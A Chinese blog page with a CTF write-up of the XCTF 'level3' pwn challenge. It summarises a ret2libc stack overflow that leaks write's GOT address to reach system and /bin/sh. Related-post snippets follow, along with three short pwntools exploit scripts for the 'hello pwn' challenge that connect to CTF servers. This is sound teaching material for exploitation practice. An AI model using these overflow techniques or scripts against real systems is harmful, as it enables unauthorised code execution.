【攻防世界pwn-level3】

原创 已于 2022-02-17 22:52:58 修改 · 3.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #CTF

于 2022-02-17 22:52:55 首次发布
本文详细介绍了如何分析一个32位程序的栈溢出漏洞,通过ida查看代码发现缺少system和bin/sh,但提供了libc。通过理解plt表和got表的工作原理,计算libc的偏移量,实现两次栈溢出:第一次获取write的实际加载地址,计算system和bin/sh地址,第二次调用system执行shell。最后展示了攻击脚本的编写和攻击过程。

下载文件后首先查看保护,发现可以进行栈溢出攻击

将文件拖入32位ida

进入vulnerable_function后,发现了read处有栈溢出漏洞

在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。

对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地址2,而这个地址2存放的是lib中write的实际加载地址3

最低0.47元/天 解锁文章
攻防世界新——level3
weixin_62675330的博客
02-10 1644
攻防世界pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
攻防世界pwn——level3
qq_62076255的博客
11-05 887
攻防世界pwn——level3
攻防世界Level3
WangLal的博客
07-05 423
攻防世界PWN新手题 level3的WP 基本三步:checksec,file,执行文件 只开了NX防护,且是个32位的文件 放进IDA中查看 main函数中只调用了一个函数,vulnerable_function(),进入函数中查看 发现read函数可以制造栈溢出漏洞。 要注意,题目还给了一个库,level3的文件中没有System函数,所以只能调用库中的函数。同时,文件PIE没开代表libc中函数的编移量就是固定的,只要确认了libc的基址,然后计算出system函数的offset,就可以定位到s
[攻防世界]level3
逆向萌新的博客
06-18 507
[攻防世界]level3,详细
攻防世界 Pwn level3
MrTreebook的博客
11-22 417
攻防世界pwn level31.checksec看一下保护2.IDA反汇编分析程序3.漏洞利用4.exp附上 1.checksec看一下保护 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 32位,开启NX保
pwn level3
weixin_45677731的博客
03-15 598
解压之后有一个level3和libc_32.so.6,拖进ida(32位) 主要就是这两个函数,一个write和一个read 这道题的基本思路就是通过第一次溢出将write函数在got表中的地址泄露,然后减去在libc_32.so.6中的偏移,得到基地址,在加上ibc_32.so.6中找到的system和"/bin/sh"偏移得到真实的地址,然后再执行一次main函数进行第二次溢出 对于writ...
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3557
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1679
学习pwn开始,慢慢来不要急
攻防世界PWN-level2
Deeeelete的博客
11-13 1274
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 3547
攻防世界的格式化字符串漏洞利用,简单题
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 1638
攻防世界pwn-level3详细题解。
攻防世界 level3
BengDouLove的博客
03-26 576
整个程序就这么几行代码, vul函数里有明显栈溢出,猜测是覆盖返回地址为system,,,但是程序里没有system也没有binsh,所以只能自己泄露 查一查write函数,三个参数,第一个为1代表输出,第二个是要输出东西的指针,第三个是输出长度 所以可以利用wirte,把第二个参数改为某个libc里面函数的地址,泄露出来,然后根据偏移得到system和binsh 但是只有一个read函数并不...
攻防世界-pwn新手区-level3
CHAWUCIREN1的博客
09-22 451
先检查运行一下 ida 看一下vulnerable_function函数 发现存在溢出,栈空间136,可以输入的长度256 但是没有发现system函数和/bin/sh 题目给了libc文件,可以 考虑利用一下 把libc丢到ida里面
攻防世界(pwn) level3
半岛铁盒的博客
03-23 512
先下载附件;,这个附件压缩包里面有好几层,挨着打开就好了 题目没有提供 System函数 和 bin/sh 字符串 来供我们调用; 可以突破的点只有read函数。通过覆盖返回地址,执行两次main函数。第一次泄漏write函数的地址,第二次执行system函数。 from pwn import* from LibcSearcher import* p=remote('111.200.241.244','31433') elf=ELF("1") main_addr=0x8048484 write_plt
[攻防世界 pwn]——level3
Y_peak的博客
02-19 264
题目地址: https://adworld.xctf.org.cn/ 题目: 以前写过这个write up请点击 偷个懒, 师傅们不要介意
Jarvis OJ - pwn level3
hanqdi_的博客
02-03 283
前言 因为换了电脑,GitHub博客的环境搭起来太麻烦了,又想有所记录,所以又回到这里啦~ level3 前段时间做过pwn题目,现在再来做,发现以前很简单的脚本利用命令都忘记了,真是,啥东西都不能放,一放就忘,这脑子不管用了。 之后每天保持做题量,保持做题手感!在这里记录并且作为监督自己的一种方式。 做题思路 没有system和binsh,又给出了libc文件,容易想到可以用ret2libc方法...
攻防世界 新手区 level3
winterze的博客
04-04 476
分享一位师傅写得,很详细,对我们小白很有帮助 https://www.cnblogs.com/cloud-tree/p/11929585.html 攻防世界 新手区 level3 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stac...
攻防世界-level3-Writeup
SkYe's Blog
05-15 591
level3 [collapse title=“展开查看详情” status=“false”] 考点:栈溢出、ROP(ret2libc) ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1, "Input:\n", 7u); return read(0, &buf, 0x100u); //溢出 } 打开了 NX 保护栈数据不可执行,程序没有预留后门。解决办法就是 ret2libc ,这
攻防世界level3
qq_25044201的博客
12-31 555
ida分析一下 发现这次level3是除了前两个显示最少的,俗话说得好,给得越少,越难。 发现没有system,也没有/bin/sh 当然这有个溢出点,可是只有溢出点 我们下载下来,发现有个libc库 我们先巩固一个知识,当调用一个函数时候,会调用plt,然后plt调用got表,如果是动态链接,got表会从libc库里找这个函数。 当然我们可以先泄露write函数的got表的地址,然后通过write-system=libc中write函数和system函数的差值找到system函数,同理找到/bi.
攻防世界pwn题hello pwn答案
最新发布
09-24
攻防世界pwn题hello pwn有多份解题代码可作为答案参考: - 代码一: ```python from pwn import * # io = process("./hello_pwn") io = remote("111.200.241.244",65258) io.recvuntil("lets get helloworld for bof") #unk_601068与dword_60106C之间有4字节的空间,所以使用4个A填充 #随后使用预期数据1853186401覆盖dword_60106C payload = b'A' * 4 + p64(1853186401) io.sendline(payload) io.interactive() ``` 此代码中,先建立远程连接,等待特定提示信息,构造包含填充字符和预期数据的`payload`,发送`payload`后进入交互模式 [^2]。 - 代码二: ```python from pwn import * context(os='linux', arch="amd64", log_level="debug") os = remote('61.147.171.105',61286) os.recvuntil('lets get helloworld for bof\n') payload = b'a'*(0x6c-0x68) + p64(1853186401) os.sendline(payload) os.interactive() ``` 该代码先设置上下文信息,建立远程连接,等待特定提示信息,根据内存地址差值构造`payload`,发送`payload`后进入交互模式 [^3]。 - 代码三: ```python from pwn import* p = remote('61.147.171.105',53737) # 将字符串转换为字节对象 str_bytes = 'a'*4 # 构造payload payload = str_bytes.encode() + p64(1853186401) p.recvuntil("lets get helloworld for bof\n") p.sendline(payload) p.interactive() ``` 代码从`pwn`库导入所有功能,创建远程连接对象,构造包含4个`a`的字符串并转换为字节对象,与预期数据拼接成`payload`,等待特定提示信息后发送`payload`,最后进入交互模式 [^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值